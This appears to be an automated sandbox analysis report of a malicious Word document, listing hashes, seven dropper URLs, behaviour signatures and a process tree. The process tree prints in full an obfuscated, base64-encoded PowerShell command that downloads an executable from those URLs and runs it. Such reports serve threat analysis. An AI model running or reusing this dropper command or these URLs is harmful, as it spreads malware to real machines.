Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 05:27

General

  • Target

    790fa0cbb62e5efdaab029d68caad4f8JaffaCakes118.doc

  • Size

    198KB

  • MD5

    790fa0cbb62e5efdaab029d68caad4f8

  • SHA1

    11ed4043da8adbd2aef9c93991b04d8f2c165024

  • SHA256

    39031955d734e86e67664eee812819b699a9bc4f869cfb4d28db7f4c99cbdcee

  • SHA512

    8da36db3a4e5913919f707eab832784aa370da3d41fcaeb037ee43d70780312f25b5d84da2dfc73d1895cec0f9c8073fa432e7ea68c259049694ca59a78ac361

  • SSDEEP

    1536:PGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilpfsdKY7xST/Ephkop8cEpTWj1K:xrfrzOH98ipg0EDvxBYIe

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://houtai.xiaopbk.com/install/t0H/

exe.dropper

https://gudangalami.com/ivo6rp/UaBj2/

exe.dropper

https://webhostingsrilanka.info/pkrgs/ODn/

exe.dropper

http://luzzeri.com/wp-includes/T1mrkC/

exe.dropper

http://mobithem.com/blogs/Z3/

exe.dropper

http://planosdesaudesemcarencia.com/erros/E8iv/

exe.dropper

http://lookuppopup.co.uk/content/uploads/XNEm9/

Signatures

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\790fa0cbb62e5efdaab029d68caad4f8JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABEAHcAdgBnAG4ANQBfAD0AKAAnAFkAawAnACsAKAAnADYAJwArACcAbQBrADgAaAAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBQAHIATwBmAGkATABFAFwARQBNAGsAcgBFAEwASwBcAHQAZwA4ADAAdQBSADEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAHQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAEMAVQBSAGAAaQBUAHkAUABSAGAAbwB0AE8AYwBgAE8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAnACsAKAAnADEAJwArACcAMgAsACcAKQArACgAJwAgAHQAbABzACcAKwAnADEAMQAnACsAJwAsACAAdABsAHMAJwApACkAOwAkAFYAbQBmAHoAdAA1ADMAIAA9ACAAKAAnAFYAdgAnACsAJwB2ACcAKwAoACcAcQBkAG0AJwArACcAMgAnACkAKQA7ACQASABuAHcAZQB1AHYANAA9ACgAJwBRACcAKwAoACcAeQB1ADkAJwArACcAagAnACsAJwB3AHMAJwApACkAOwAkAEEAdQAwAG4AbABxAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBmACcAKwAnAGcASwAnACkAKwAoACcARQBtACcAKwAnAGsAcgBlACcAKQArACgAJwBsAGsAJwArACcAZgAnACsAJwBnAEsAVABnACcAKwAnADgAMAB1ACcAKQArACgAJwByACcAKwAnADEAZgBnAEsAJwApACkALgAiAFIARQBgAHAAYABMAGEAQwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAyACsAWwBDAEgAYQBSAF0AMQAwADMAKwBbAEMASABhAFIAXQA3ADUAKQAsACcAXAAnACkAKQArACQAVgBtAGYAegB0ADUAMwArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAEoAdAB1ADUAcQA5AG0APQAoACgAJwBaACcAKwAnAHYAZQAnACkAKwAoACcAMAA4ACcAKwAnAGoAbwAnACkAKQA7ACQAVwBfAHEAdwAyAGwAaAA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQARgByAHcAeQB6AHEAdgA9ACgAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBoAG8AJwArACcAdQB0AGEAJwApACsAKAAnAGkALgAnACsAJwB4AGkAJwApACsAJwBhACcAKwAoACcAbwBwAGIAawAuAGMAbwAnACsAJwBtACcAKwAnAC8AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQBsACcAKwAnAGwAJwApACsAKAAnAC8AdAAwACcAKwAnAEgALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwAHMAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAGcAJwArACcAdQBkAGEAbgAnACkAKwAoACcAZwBhAGwAJwArACcAYQAnACkAKwAoACcAbQAnACsAJwBpAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAaQAnACsAJwB2ACcAKwAnAG8ANgByACcAKwAnAHAALwBVAGEAQgBqACcAKQArACgAJwAyACcAKwAnAC8AKgBoACcAKwAnAHQAdABwACcAKQArACcAcwA6ACcAKwAoACcALwAvAHcAZQAnACsAJwBiACcAKwAnAGgAbwBzAHQAaQAnACkAKwAnAG4AJwArACcAZwAnACsAJwBzACcAKwAnAHIAaQAnACsAJwBsACcAKwAoACcAYQBuACcAKwAnAGsAYQAnACkAKwAoACcALgBpAG4AJwArACcAZgBvAC8AJwArACcAcAAnACsAJwBrAHIAZwBzAC8ATwBEAG4ALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAnACsAKAAnAC8AJwArACcALwBsAHUAJwApACsAKAAnAHoAegBlACcAKwAnAHIAJwArACcAaQAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACcAaQBuACcAKwAoACcAYwAnACsAJwBsAHUAZAAnACkAKwAnAGUAJwArACgAJwBzAC8AVAAxACcAKwAnAG0AcgAnACsAJwBrAEMALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAbwAnACkAKwAoACcAYgBpAHQAJwArACcAaAAnACkAKwAnAGUAbQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAoACcAYgBsACcAKwAnAG8AZwBzAC8AJwApACsAJwBaADMAJwArACgAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAvAC8AcAAnACsAJwBsACcAKQArACgAJwBhAG4AJwArACcAbwAnACkAKwAnAHMAJwArACcAZABlACcAKwAoACcAcwAnACsAJwBhAHUAJwApACsAJwBkAGUAJwArACgAJwBzACcAKwAnAGUAbQBjACcAKwAnAGEAcgBlAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC4AJwArACcAYwBvACcAKwAnAG0ALwBlACcAKQArACgAJwByAHIAJwArACcAbwAnACkAKwAoACcAcwAvAEUAOAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8ALwBsAG8AbwAnACkAKwAnAGsAdQAnACsAJwBwACcAKwAoACcAcAAnACsAJwBvAHAAJwApACsAJwB1ACcAKwAoACcAcAAuAGMAJwArACcAbwAuAHUAJwArACcAawAvAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAbgB0AC8AJwArACcAdQBwAGwAbwBhAGQAJwArACcAcwAvAFgAJwApACsAKAAnAE4ARQAnACsAJwBtACcAKQArACcAOQAvACcAKQAuACIAUwBwAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXADYANwBfAGkANgBoAD0AKAAnAE0AdAAnACsAJwB6ACcAKwAoACcAeAAnACsAJwBuAGoAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEQAdwBxADMANABvADUAIABpAG4AIAAkAEYAcgB3AHkAegBxAHYAKQB7AHQAcgB5AHsAJABXAF8AcQB3ADIAbABoAC4AIgBEAGAAbwB3AE4AbABPAGAAQQBkAEYAYABJAGwARQAiACgAJABEAHcAcQAzADQAbwA1ACwAIAAkAEEAdQAwAG4AbABxAHUAKQA7ACQAQwBpAGQAdgA0ADgAawA9ACgAKAAnAEEAMgAnACsAJwBmADAAcQAnACkAKwAnADUAcQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQQB1ADAAbgBsAHEAdQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA2ADkANQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABBAHUAMABuAGwAcQB1ACkAOwAkAFQAYgBvADEAcwBkAHQAPQAoACgAJwBGACcAKwAnAG0AOAAnACkAKwAnAGkAJwArACgAJwB6ACcAKwAnAHMAMQAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA2AHkAZwA0AGEAXwA9ACgAJwBOADAAJwArACgAJwBzAHoAJwArACcAagAnACkAKwAnADgAeQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbQB3AGgAeQB0AHYAPQAoACcATwAnACsAKAAnAGoAJwArACcAdgB1AG8AZQBtACcAKQApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2412

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      2ff2ab63bde55978e37158936e4710ed

      SHA1

      1baf5439fb1d2eeaf8fd330e8e04f34e6fcfd594

      SHA256

      3a74126246e5a8f82c1110f8c365511207022d8411047dd0f0dabb2d346737fd

      SHA512

      1250bebd5947eb75fc443a8f38e87c223149b1b6b2611dd94c1ccfe577f568d50f87496906c3b2470064b81420bf522549108fdaa1866171103c40401a41e9d8

    • memory/2412-40-0x0000000002920000-0x0000000002928000-memory.dmp

      Filesize

      32KB

    • memory/2412-39-0x000000001B560000-0x000000001B842000-memory.dmp

      Filesize

      2.9MB

    • memory/2600-27-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2600-8-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-26-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-12-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-16-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-19-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-14-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-22-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-20-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-18-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-17-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-15-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-13-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-10-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-11-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-24-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-0-0x000000002F6D1000-0x000000002F6D2000-memory.dmp

      Filesize

      4KB

    • memory/2600-9-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-7-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-32-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-23-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-31-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-30-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-29-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-21-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-28-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-33-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-6-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-2-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/2600-45-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/2600-46-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-48-0x0000000005EA0000-0x0000000005FA0000-memory.dmp

      Filesize

      1024KB

    • memory/2600-49-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2600-25-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2600-67-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB